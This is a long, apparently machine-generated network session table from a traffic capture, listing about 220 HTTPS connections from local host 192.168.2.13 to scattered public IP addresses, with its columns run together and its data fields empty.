                                                19501192.168.2.134341487.120.36.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19502192.168.2.1334228147.181.102.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19503192.168.2.1345734164.74.120.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19504192.168.2.1349294199.52.179.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19505192.168.2.1333282111.211.209.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19506192.168.2.133362464.173.44.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19507192.168.2.1353058201.98.197.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19508192.168.2.1354118207.4.254.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19509192.168.2.1351614102.123.166.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19510192.168.2.135347881.210.240.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19511192.168.2.133802851.141.75.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19512192.168.2.1351902178.219.1.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19513192.168.2.1346846116.145.61.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19514192.168.2.134759464.5.184.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19515192.168.2.1356504141.108.222.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19516192.168.2.135168281.158.173.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19517192.168.2.1345616155.60.225.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19518192.168.2.135624224.217.69.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19519192.168.2.134877287.105.234.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19520192.168.2.1359850181.101.138.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19521192.168.2.135022299.205.36.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19522192.168.2.13532462.56.114.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19523192.168.2.134572882.23.157.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19524192.168.2.1350534152.148.197.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19525192.168.2.134154076.98.225.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19526192.168.2.1340362218.78.18.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19527192.168.2.1333028164.242.10.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19528192.168.2.134361871.172.247.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19529192.168.2.134181477.23.219.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19530192.168.2.1340320133.246.225.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19531192.168.2.133482881.112.39.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19532192.168.2.135013697.59.80.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19533192.168.2.134245493.106.236.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19534192.168.2.1357722130.146.203.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19535192.168.2.1340298103.163.57.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19536192.168.2.1347212120.67.203.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19537192.168.2.133547234.55.63.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19538192.168.2.1342688171.190.213.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19539192.168.2.135100472.149.195.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19540192.168.2.1353594141.44.40.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19541192.168.2.1354502185.240.65.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19542192.168.2.1337792183.248.250.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19543192.168.2.133679017.78.199.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19544192.168.2.133364879.50.5.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19545192.168.2.135442434.93.250.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19546192.168.2.134274241.158.235.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19547192.168.2.1344102218.212.107.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19548192.168.2.133943618.229.34.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19549192.168.2.1353540136.132.135.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19550192.168.2.1347558218.130.244.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19551192.168.2.1347824144.229.88.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19552192.168.2.1351452219.142.48.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19553192.168.2.1337264119.120.214.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19554192.168.2.134340458.103.116.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19555192.168.2.1341778210.210.126.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19556192.168.2.1335708182.8.158.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19557192.168.2.135930425.214.203.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19558192.168.2.135130283.97.40.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19559192.168.2.1360384112.117.238.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19560192.168.2.1332850209.240.79.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19561192.168.2.1353726116.33.112.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19562192.168.2.1341370143.33.133.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19563192.168.2.134457099.113.149.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19564192.168.2.134130872.31.199.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19565192.168.2.135452632.158.70.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19566192.168.2.1358212164.101.107.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19567192.168.2.134880089.206.168.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19568192.168.2.1349098218.166.23.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19569192.168.2.1353778179.255.184.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19570192.168.2.1351618190.102.249.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19571192.168.2.1349868206.252.113.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19572192.168.2.1335024124.141.137.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19573192.168.2.1335092160.44.11.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19574192.168.2.135964670.5.119.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19575192.168.2.134208474.65.186.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19576192.168.2.13593705.65.85.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19577192.168.2.135804691.163.145.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19578192.168.2.133688035.27.132.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19579192.168.2.1350676133.90.200.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19580192.168.2.1358816192.233.169.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19581192.168.2.1336034134.157.221.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19582192.168.2.1358944178.125.25.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19583192.168.2.134714048.3.54.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19584192.168.2.134991868.218.227.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19585192.168.2.1339106138.232.139.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19586192.168.2.1345656178.73.156.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19587192.168.2.1338870142.19.198.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19588192.168.2.1346032204.137.139.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19589192.168.2.1353590112.190.82.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19590192.168.2.1353138119.150.235.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19591192.168.2.1360762110.127.75.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19592192.168.2.1356036135.99.33.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19593192.168.2.1347094205.232.131.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19594192.168.2.135469080.114.168.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19595192.168.2.1345588118.253.165.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19596192.168.2.1358414115.69.216.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19597192.168.2.1335992123.93.46.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19598192.168.2.1349568133.233.134.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19599192.168.2.1338454183.64.221.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19600192.168.2.1339786138.124.121.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19601192.168.2.134963818.62.202.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19602192.168.2.135610636.28.210.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19603192.168.2.135179079.119.46.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19604192.168.2.135612825.23.228.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19605192.168.2.133642219.81.216.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19606192.168.2.134246298.201.189.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19607192.168.2.1336390124.121.76.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19608192.168.2.1338616150.206.79.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19609192.168.2.134073877.177.157.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19610192.168.2.1344450203.227.207.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19611192.168.2.134289096.56.87.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19612192.168.2.133591813.126.206.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19613192.168.2.1333582121.171.36.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19614192.168.2.133521094.44.84.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19615192.168.2.133480878.231.172.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19616192.168.2.1352866176.230.47.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19617192.168.2.134654859.63.95.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19618192.168.2.135850238.101.73.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19619192.168.2.1337698121.11.171.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19620192.168.2.1338622175.23.211.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19621192.168.2.134153883.134.72.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19622192.168.2.1337172116.122.233.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19623192.168.2.1357496161.255.115.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19624192.168.2.133654639.80.126.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19625192.168.2.1349648218.43.20.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19626192.168.2.1343744167.87.178.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19627192.168.2.1357234128.33.97.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19628192.168.2.1356300212.249.134.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19629192.168.2.1356754111.152.231.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19630192.168.2.134650281.150.98.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19631192.168.2.134212688.211.82.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19632192.168.2.1352824207.82.187.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19633192.168.2.1353280126.98.19.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19634192.168.2.13351344.33.219.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19635192.168.2.134602042.224.23.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19636192.168.2.1353252149.204.243.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19637192.168.2.1351958154.106.235.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19638192.168.2.135863060.83.186.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19639192.168.2.1360226153.157.15.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19640192.168.2.135672837.8.126.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19641192.168.2.134548612.80.209.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19642192.168.2.1356666114.191.195.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19643192.168.2.133507041.253.245.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19644192.168.2.1354314125.162.73.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19645192.168.2.133453675.109.2.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19646192.168.2.135234098.178.22.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19647192.168.2.135737290.183.103.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19648192.168.2.134804887.32.12.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19649192.168.2.1354238183.67.217.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19650192.168.2.1335710191.2.174.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19651192.168.2.134646849.87.195.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19652192.168.2.134568243.102.193.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19653192.168.2.135831852.128.200.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19654192.168.2.1346968138.211.83.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19655192.168.2.134240285.107.58.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19656192.168.2.1353162137.99.218.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19657192.168.2.1337100133.96.168.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19658192.168.2.1344874175.193.188.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19659192.168.2.135339242.101.9.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19660192.168.2.1339412194.121.133.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19661192.168.2.1339996121.244.57.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19662192.168.2.1347756106.10.254.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19663192.168.2.1336568222.137.68.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19664192.168.2.1353722139.171.154.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19665192.168.2.1354038116.123.42.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19666192.168.2.1339088213.237.145.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19667192.168.2.136002412.127.140.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19668192.168.2.1357530142.224.167.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19669192.168.2.1338070195.90.85.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19670192.168.2.1343808118.88.95.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19671192.168.2.135763220.227.41.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19672192.168.2.1344118211.107.171.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19673192.168.2.1337160162.228.59.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19674192.168.2.1333746144.234.111.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19675192.168.2.1355574186.46.152.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19676192.168.2.1344810197.8.149.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19677192.168.2.135665039.6.204.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19678192.168.2.1343916143.146.248.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19679192.168.2.1349436192.73.247.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19680192.168.2.13372502.70.229.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19681192.168.2.1349068192.252.36.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19682192.168.2.1359336145.194.23.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19683192.168.2.133382053.137.163.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19684192.168.2.1335040216.9.239.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19685192.168.2.1336096211.13.82.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19686192.168.2.134706267.220.185.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19687192.168.2.135721849.47.70.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19688192.168.2.1355610121.166.88.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19689192.168.2.1352744208.120.15.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19690192.168.2.1339752187.160.101.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19691192.168.2.1337618201.176.243.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19692192.168.2.1334868177.19.40.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19693192.168.2.1346496149.73.80.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19694192.168.2.1337772162.80.126.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19695192.168.2.1339280121.40.238.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19696192.168.2.1344226146.122.171.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19697192.168.2.1333484109.20.24.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19698192.168.2.135140063.161.128.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19699192.168.2.1334740172.220.3.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19700192.168.2.134109489.152.132.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19701192.168.2.133289095.210.203.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19702192.168.2.1346762121.240.4.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19703192.168.2.1353896194.68.54.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19704192.168.2.1349344106.221.85.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19705192.168.2.1357514182.205.211.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19706192.168.2.13497822.41.25.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19707192.168.2.133537878.142.10.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19708192.168.2.1352556109.53.3.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19709192.168.2.1346232117.2.191.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19710192.168.2.1346244109.111.100.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19711192.168.2.134950440.232.33.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19712192.168.2.133803623.101.20.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19713192.168.2.1333936177.119.1.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19714192.168.2.1342800115.13.41.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19715192.168.2.134168474.6.109.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19716192.168.2.1337654178.219.232.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19717192.168.2.1355188147.162.150.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19718192.168.2.1344118148.238.30.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19719192.168.2.1339722170.155.166.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19720192.168.2.135461031.201.141.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19721192.168.2.1340132218.35.35.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19722192.168.2.13501142.12.19.68443
                                                TimestampBytes transferredDirectionData


